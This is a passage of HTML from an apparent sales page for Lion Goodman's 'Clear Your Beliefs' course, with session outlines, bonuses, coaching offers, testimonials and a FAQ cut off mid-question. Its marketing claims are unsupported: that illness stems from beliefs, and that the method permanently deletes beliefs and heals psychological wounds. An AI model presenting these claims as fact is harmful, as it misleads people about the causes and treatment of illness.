dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>==&gt;&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>==&gt;&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the 